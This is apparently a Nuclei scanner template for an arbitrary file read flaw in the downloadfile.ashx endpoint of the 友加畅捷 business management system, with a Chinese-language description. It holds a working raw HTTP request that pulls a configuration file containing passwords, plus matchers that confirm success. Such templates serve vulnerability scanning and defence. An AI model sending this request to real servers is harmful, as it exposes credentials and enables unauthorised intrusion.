id: u-plus-downloadfile-fileread
info:
  name: 友加畅捷管理系统 downloadfile.ashx 任意文件读取漏洞
  author: leadlife
  severity: high
  description: 友加畅捷管理系统是一款专为小微商贸流通企业设计的财务业务一体化管理软件，涵盖进销存、财务、分销及移动管理等多个模块，旨在帮助企业实现高效的业务运营和财务核算。该系统的 downloadfile.ashx 接口存在任意文件读取漏洞。攻击者可利用此漏洞，未经授权地读取服务器上的任意文件，包括但不限于系统配置文件和数据库配置文件等敏感信息。 成功利用此漏洞可能导致企业内部敏感数据泄露，对系统的机密性和完整性构成潜在威胁。
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/zyqhde2crfvaqysy
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: u-plus,fileread

http:
  - raw:
      - |
        GET /Controllers/ajax/downloadfile.ashx?fileurl=config/sysconfig_zts.fig HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'xml version','pwd','ZTName')
        condition: and